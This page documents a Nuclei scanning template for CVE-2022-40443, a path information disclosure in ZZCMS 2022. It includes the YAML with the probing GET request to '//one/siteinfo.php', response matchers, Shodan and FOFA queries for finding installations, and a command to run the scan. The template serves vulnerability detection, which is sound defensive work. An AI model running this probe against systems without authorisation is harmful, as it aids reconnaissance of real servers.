ZZCMS 2022 - Path Information Disclosure
ID: CVE-2022-40443
Severity: low
Author: ritikchaddha
Tags: cve,cve22,zzcms,disclosure
Description
Section titled “Description”An absolute path traversal vulnerability in ZZCMS 2022 allows attackers to obtain sensitive information via a crafted GET request.
YAML Source
Section titled “YAML Source”id: CVE-2022-40443
info: name: ZZCMS 2022 - Path Information Disclosure author: ritikchaddha severity: low description: | An absolute path traversal vulnerability in ZZCMS 2022 allows attackers to obtain sensitive information via a crafted GET request. impact: | An attacker can gain sensitive information about the server's file system. remediation: | Apply the vendor-supplied patch or upgrade to a non-vulnerable version. reference: - https://github.com/liong007/ZZCMS/issues/1 - https://nvd.nist.gov/vuln/detail/CVE-2022-40443 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2022-40443 cwe-id: CWE-22 epss-score: 0.00103 epss-percentile: 0.41353 cpe: cpe:2.3:a:zzcms:zzcms:2022:*:*:*:*:*:*:* metadata: vendor: zzcms product: zzcms shodan-query: html:"zzcms" fofa-query: body="zzcms" tags: cve,cve22,zzcms,disclosure
http: - method: GET path: - "{{BaseURL}}//one/siteinfo.php"
matchers-condition: and matchers: - type: regex part: body regex: - 'class="titlebig' - 'zzcms' - 'siteinfo[-_]\d+\.html?' condition: and
- type: word part: body words: - '暂无信息' negative: true# digest: 4b0a00483046022100b6d3453a1e824d5d3823f7e59a821109a127e743febac62237213494dc5603120221008274e4dccbe4ba271b4d3a079fb75c7d6c2e30c570ee21facab02633ba750297:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-40443.yaml"